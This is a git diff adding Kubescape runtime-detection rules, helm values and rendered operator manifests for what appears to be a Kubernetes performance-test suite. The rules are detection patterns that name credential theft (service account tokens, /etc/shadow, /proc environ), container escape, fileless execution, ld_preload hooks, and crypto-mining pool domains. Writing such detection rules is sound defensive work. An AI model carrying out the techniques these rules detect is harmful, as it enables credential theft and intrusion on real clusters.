unexpected system calls that are not whitelisted by application + profile + enabled: false + expressions: + message: >- + 'Unexpected system call detected: ' + event.syscallName + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + uniqueId: event.syscallName + id: R0003 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Syscalls Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - syscall + - applicationprofile + - description: >- + Detects unexpected capabilities that are not whitelisted by application + profile + enabled: true + expressions: + message: >- + 'Unexpected capability used: ' + event.capName + ' in syscall ' + + event.syscallName + ' with PID ' + string(event.pid) + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + uniqueId: event.comm + '_' + event.capName + id: R0004 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Linux Capabilities Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - capabilities + - applicationprofile + - description: >- + Detecting unexpected domain requests that are not whitelisted by + application profile. + enabled: true + expressions: + message: >- + 'Unexpected domain communication: ' + event.name + ' from: ' + + event.containerName + ruleExpression: + - eventType: dns + expression: >- + !event.name.endsWith('.svc.cluster.local.') && + !nn.is_domain_in_egress(event.containerId, event.name) + uniqueId: event.comm + '_' + event.name + id: R0005 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: DNS Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - dns + - anomaly + - networkprofile + - description: Detecting unexpected access to service account token. + enabled: true + expressions: + message: >- + 'Unexpected access to service account token: ' + event.path + ' with + flags: ' + event.flags.join(',') + ruleExpression: + - eventType: open + expression: > + ((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount') + && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token'))) && + !ap.was_path_opened_with_suffix(event.containerId, '/token') + uniqueId: event.comm + id: R0006 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + name: Unexpected service account token access + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - serviceaccount + - applicationprofile + - description: Detecting execution of kubernetes client + enabled: true + expressions: + message: >- + eventType == 'exec' ? 'Kubernetes client (' + event.comm + ') was + executed with PID ' + string(event.pid) : 'Network connection to + Kubernetes API server from container ' + event.containerName + ruleExpression: + - eventType: exec + expression: >- + (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && + k8s.is_api_server_address(event.dstAddr) && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: >- + eventType == 'exec' ? 'exec_' + event.comm : 'network_' + + event.dstAddr + id: R0007 + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + name: Workload uses Kubernetes API unexpectedly + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - exec + - network + - anomaly + - applicationprofile + - description: Detecting reading environment variables from procfs. + enabled: true + expressions: + message: >- + 'Reading environment variables from procfs: ' + event.path + ' by + process ' + event.comm + ruleExpression: + - eventType: open + expression: > + event.path.startsWith('/proc/') && + event.path.endsWith('/environ') && + !ap.was_path_opened_with_suffix(event.containerId, '/environ') + uniqueId: event.comm + '_' + event.path + id: R0008 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + name: Read Environment Variables from procfs + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - procfs + - environment + - applicationprofile + - description: Detecting eBPF program load. + enabled: true + expressions: + message: >- + 'bpf program load system call (bpf) was called by process (' + + event.comm + ') with command (BPF_PROG_LOAD)' + ruleExpression: + - eventType: bpf + expression: >- + event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + id: R0009 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + name: eBPF Program Load + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - bpf + - ebpf + - applicationprofile + - description: Detecting access to sensitive files. + enabled: true + expressions: + message: >- + 'Unexpected sensitive file access: ' + event.path + ' by process ' + + event.comm + ruleExpression: + - eventType: open + expression: >- + event.path.startsWith('/etc/shadow') && + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Unexpected Sensitive File Access + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - files + - anomaly + - applicationprofile + - description: >- + Detecting unexpected egress network traffic that is not whitelisted by + application profile. + enabled: false + expressions: + message: >- + 'Unexpected egress network communication to: ' + event.dstAddr + ':' + + string(event.dstPort) + ' using ' + event.proto + ' from: ' + + event.containerName + ruleExpression: + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + id: R0011 + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + name: Unexpected Egress Network Traffic + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - whitelisted + - network + - anomaly + - networkprofile + - description: 'Detecting exec calls that are from malicious source like: /dev/shm' + enabled: true + expressions: + message: >- + 'Execution from malicious source: ' + event.exepath + ' in directory ' + + event.cwd + ruleExpression: + - eventType: exec + expression: > + (event.exepath == '/dev/shm' || + event.exepath.startsWith('/dev/shm/')) || (event.cwd == '/dev/shm' + || event.cwd.startsWith('/dev/shm/') || + (parse.get_exec_path(event.args, + event.comm).startsWith('/dev/shm/'))) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1000 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from malicious source + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - exec + - signature + - malicious + - description: Detecting exec calls of binaries that are not included in the base image + enabled: true + expressions: + message: >- + 'Process (' + event.comm + ') was executed and is not part of the + image' + ruleExpression: + - eventType: exec + expression: > + (event.upperlayer == true || + event.pupperlayer == true) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1001 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + name: Drifted process executed + profileDependency: 1 + severity: 8 + supportPolicy: false + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - description: Detecting Kernel Module Load. + enabled: true + expressions: + message: >- + 'Kernel module (' + event.module + ') loading attempt with syscall (' + + event.syscallName + ') was called by process (' + event.comm + ')' + ruleExpression: + - eventType: kmod + expression: >- + event.syscallName == 'init_module' || event.syscallName == + 'finit_module' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + id: R1002 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + name: Process tries to load a kernel module + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - kmod + - kernel + - module + - load + - description: Detecting ssh connection to disallowed port + enabled: false + expressions: + message: >- + 'Malicious SSH connection attempt to ' + event.dstIp + ':' + + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: >- + dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && + !nn.was_address_in_egress(event.containerId, event.dstIp) + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + id: R1003 + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + name: Disallowed ssh connection + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - description: Detecting exec calls from mounted paths. + enabled: true + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) && + k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) + || parse.get_exec_path(event.args, event.comm).startsWith(mount)) + uniqueId: event.comm + id: R1004 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from mount + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - exec + - mount + - applicationprofile + - description: Detecting Fileless Execution + enabled: true + expressions: + message: >- + 'Fileless execution detected: exec call "' + event.comm + '" is from a + malicious source' + ruleExpression: + - eventType: exec + expression: >- + event.exepath.contains('memfd') || + event.exepath.startsWith('/proc/self/fd') || + event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1005 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + name: Fileless execution detected + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - fileless + - execution + - malicious + - description: >- + Detecting Unshare System Call usage, which can be used to escape + container. + enabled: true + expressions: + message: >- + 'Unshare system call (unshare) was called by process (' + event.comm + + ')' + ruleExpression: + - eventType: unshare + expression: >- + event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + uniqueId: event.comm + '_' + 'unshare' + id: R1006 + isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + name: Process tries to escape container + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - description: Detecting XMR Crypto Miners by randomx algorithm usage. + enabled: true + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + ruleExpression: + - eventType: randomx + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1007 + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + name: Crypto miner launched + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - crypto + - miners + - malicious + - description: Detecting Crypto miners communication by domain + enabled: true + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + ruleExpression: + - eventType: dns + expression: >- + event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', + 'btm.antpool.com.', 'c3pool.com.', 'c4pool.org.', + 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', + 'de.minexmr.com.', 'eth-ar.dwarfpool.com.', + 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', + 'eth-br.dwarfpool.com.', 'eth-cn.dwarfpool.com.', + 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', + 'eth-hk.dwarfpool.com.', 'eth-jp1.nanopool.org.', + 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', + 'eth-us-west1.nanopool.org.', 'eth-us.dwarfpool.com.', + 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', + 'eu.stratum.slushpool.com.', 'eu1.ethermine.org.', + 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', + 'miningmadness.com.', 'monero.cedric-crispin.com.', + 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', + 'monerohash.com.', 'moneroocean.stream.', 'monerop.com.', + 'multi-pools.com.', 'p2pool.io.', 'pool.kryptex.com.', + 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', + 'prohashing.com.', 'rx.unmineable.com.', 'sg.minexmr.com.', + 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', + 'stratum-btm.antpool.com.', 'stratum-dash.antpool.com.', + 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', + 'stratum.antpool.com.', 'supportxmr.com.', 'trustpool.cc.', + 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', + 'web.xmrpool.eu.', 'www.domajorpool.com.', 'www.dxpool.com.', + 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', + 'xmr-eu1.nanopool.org.', 'xmr-eu2.nanopool.org.', + 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', + 'xmr.crypto-pool.fr.', 'xmr.gntl.uk.', 'xmr.nanopool.org.', + 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', + 'zec.antpool.com.', 'zergpool.com.', 'auto.c3pool.org.', + 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + uniqueId: event.name + '_' + event.comm + id: R1008 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: Crypto Mining Domain Communication + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - dns + - description: Detecting Crypto Miners by suspicious port usage. + enabled: true + expressions: + message: >- + 'Detected crypto mining related port communication on port ' + + string(event.dstPort) + ' to ' + event.dstAddr + ' with protocol ' + + event.proto + ruleExpression: + - eventType: network + expression: >- + event.proto == 'TCP' && event.pktType == 'OUTGOING' && + event.dstPort in [3333, 45700] && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.comm + '_' + string(event.dstPort) + id: R1009 + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + name: Crypto Mining Related Port Communication + profileDependency: 1 + severity: 3 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - description: Detects symlink creation over sensitive files + enabled: true + expressions: + message: >- + 'Symlink created over sensitive file: ' + event.oldPath + ' -> ' + + event.newPath + ruleExpression: + - eventType: symlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Soft link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - anomaly + - symlink + - applicationprofile + - description: Detecting ld_preload hook techniques. + enabled: false + expressions: + message: >- + eventType == 'exec' ? 'Process (' + event.comm + ') is using a dynamic + linker hook: ' + process.get_ld_hook_var(event.pid) : 'The dynamic + linker configuration file (' + event.path + ') was modified by process + (' + event.comm + ')' + ruleExpression: + - eventType: exec + expression: >- + event.comm != 'java' && event.containerName != 'matlab' && + process.get_ld_hook_var(event.pid) != '' + - eventType: open + expression: >- + event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && + event.flagsRaw != 0 + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + id: R1011 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + name: ld_preload hooks technique detected + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - exec + - malicious + - applicationprofile + - description: Detecting hardlink creation over sensitive files. + enabled: true + expressions: + message: >- + 'Hardlink created over sensitive file: ' + event.oldPath + ' - ' + + event.newPath + ruleExpression: + - eventType: hardlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1012 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Hard link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - files + - malicious + - applicationprofile + - description: Detecting potentially malicious ptrace usage. + enabled: true + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + ruleExpression: + - eventType: ptrace + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1015 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + name: Malicious Ptrace Usage + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - process + - malicious + - description: >- + Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + enabled: true + expressions: + message: >- + 'Unexpected io_uring operation detected: (opcode=' + + string(event.opcode) + ') flags=0x' + (has(event.flagsRaw) ? + string(event.flagsRaw) : '0') + ' in ' + event.comm + '.' + ruleExpression: + - eventType: iouring + expression: 'true' + uniqueId: string(event.opcode) + '_' + event.comm + id: R1030 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + name: Unexpected io_uring Operation Detected + profileDependency: 0 + severity: 5 + supportPolicy: true + tags: + - syscalls + - io_uring + - applicationprofile + - description: >- + Detects plaintext exec API calls intercepted from kubelet TLS + connections, indicating potential unauthorized command execution via the + kubelet API. + enabled: true + expressions: + message: >- + 'Kubelet TLS exec request intercepted: ' + event.tlsData + ' (len=' + + string(event.tlsDataLen) + ', type=' + string(event.tlsEventType) + + ') in ' + event.comm + '.' + ruleExpression: + - eventType: kubelet_tls + expression: 'true' + uniqueId: event.comm + '_' + string(event.tlsEventType) + id: R1031 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1609 + name: Kubelet TLS Exec Request Detected + profileDependency: 0 + severity: 8 + supportPolicy: false + tags: + - kubelet + - tls + - exec + - container_administration_command diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml new file mode 100644 index 00000000000..cb9e252b95e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml @@ -0,0 +1,38 @@ +storage: + image: + repository: ghcr.io/k8sstormcenter/storage + tag: "dev-e64d59a" + +nodeAgent: + image: + repository: ghcr.io/k8sstormcenter/node-agent + tag: "dev-e64d59a" + config: + maxLearningPeriod: 2m + learningPeriod: 2m + updatePeriod: 10000m + # The Service declares a "prometheus" port (8080) but node-agent's stock + # config disables the exporter. Enable it so the perf_tool's + # KubescapeNodeAgentMetrics recorder can scrape per-node alert/event + # counters. Note: the chart key is the string "enable"/"disable", which + # the chart converts to the JSON `prometheusExporterEnabled` boolean + # in the node-agent ConfigMap. + prometheusExporter: enable + ruleCooldown: + ruleCooldownDuration: 0h + ruleCooldownAfterCount: 1000000000 + ruleCooldownOnProfileFailure: false + ruleCooldownMaxSize: 20000 +capabilities: + runtimeDetection: enable + networkEventsStreaming: disable + # Top-level prometheusExporter capability gate. Both this and + # nodeAgent.config.prometheusExporter must be `enable` for the node-agent + # to bind on port 8080. + prometheusExporter: enable +alertCRD: + installDefault: true + scopeClustered: true +clusterName: bobexample +ksNamespace: honey +excludeNamespaces: "kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse" diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml new file mode 100644 index 00000000000..392f98dd58f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml @@ -0,0 +1,25 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: storage-auth-reader + namespace: kube-system + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: extension-apiserver-authentication-reader +subjects: +- kind: ServiceAccount + name: storage + namespace: honey diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml new file mode 100644 index 00000000000..1784290193f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml @@ -0,0 +1,4433 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: operatorcommands.kubescape.io +spec: + group: kubescape.io + names: + plural: operatorcommands + singular: operatorcommand + kind: OperatorCommand + shortNames: + - opcmd + scope: Namespaced + versions: + - name: v1alpha1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + guid: + type: string + commandType: + type: string + commandVersion: + type: string + nullable: true + designators: + type: array + items: + type: object + additionalProperties: true + body: + type: string + format: byte + nullable: true + ttl: + type: string + format: duration + nullable: true + args: + type: object + additionalProperties: true + nullable: true + commandIndex: + type: integer + nullable: true + commandCount: + type: integer + nullable: true + status: + type: object + properties: + started: + type: boolean + startedAt: + type: string + format: date-time + nullable: true + completed: + type: boolean + completedAt: + type: string + format: date-time + nullable: true + executer: + type: string + nullable: true + error: + type: object + nullable: true + properties: + reason: + type: string + nullable: true + message: + type: string + nullable: true + errorCode: + type: integer + nullable: true + payload: + type: string + format: byte + nullable: true + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: rules.kubescape.io +spec: + group: kubescape.io + names: + kind: Rules + listKind: RulesList + plural: rules + singular: rule + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + rules: + type: array + items: + type: object + properties: + enabled: + type: boolean + description: Whether the rule is enabled + id: + type: string + description: Unique identifier for the rule + name: + type: string + description: Name of the rule + description: + type: string + description: Description of the rule + expressions: + type: object + properties: + message: + type: string + description: Message expression + uniqueId: + type: string + description: Unique identifier expression + ruleExpression: + type: array + items: + type: object + properties: + eventType: + type: string + description: Type of event this expression handles + expression: + type: string + description: The rule expression string + required: + - eventType + - expression + required: + - message + - uniqueId + - ruleExpression + profileDependency: + type: integer + enum: + - 0 + - 1 + - 2 + description: Profile dependency level (0=Required, 1=Optional, + 2=NotRequired) + severity: + type: integer + description: Severity level of the rule + supportPolicy: + type: boolean + description: Whether the rule supports rule policy enforcement + default: false + tags: + type: array + items: + type: string + description: Tags associated with the rule + state: + type: object + additionalProperties: true + description: State information for the rule + agentVersionRequirement: + type: string + description: Agent version requirement to evaluate this rule + (supports semver ranges like ~1.0, >=1.2.0, etc.) + isTriggerAlert: + type: boolean + description: Whether the rule is a trigger alert + default: true + mitreTechnique: + type: string + description: MITRE technique associated with the rule + mitreTactic: + type: string + description: MITRE tactic associated with the rule + required: + - enabled + - id + - name + - description + - expressions + - profileDependency + - severity + - supportPolicy + - isTriggerAlert + - mitreTechnique + - mitreTactic + required: + - rules + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: servicesscanresults.kubescape.io +spec: + group: kubescape.io + names: + kind: ServiceScanResult + plural: servicesscanresults + shortNames: + - kssa + singular: servicescanresult + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + clusterIP: + type: string + ports: + type: array + items: + type: object + properties: + port: + type: integer + protocol: + type: string + sessionLayer: + type: string + presentationLayer: + type: string + applicationLayer: + type: string + authenticated: + type: boolean + nullable: true +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: runtimerulealertbindings.kubescape.io +spec: + group: kubescape.io + names: + kind: RuntimeRuleAlertBinding + plural: runtimerulealertbindings + shortNames: + - rab + singular: runtimerulealertbinding + scope: Cluster + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + namespaceSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + podSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + rules: + type: array + items: + type: object + oneOf: + - not: + anyOf: + - required: + - ruleID + - required: + - ruleName + required: + - ruleTags + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleName + required: + - ruleID + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleID + required: + - ruleName + properties: + parameters: + type: object + additionalProperties: true + ruleID: + type: string + ruleName: + type: string + ruleTags: + type: array + items: + type: string + severity: + type: string +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubescape + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubevuln + namespace: honey +automountServiceAccountToken: false +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: operator + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: prometheus-exporter + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: Secret +apiVersion: v1 +metadata: + name: cloud-secret + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: cloud-secret + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: cloud-secret + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/infra: credentials +type: Opaque +data: + account: '' + accessKey: '' +--- +apiVersion: v1 +kind: Secret +metadata: + name: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.key: 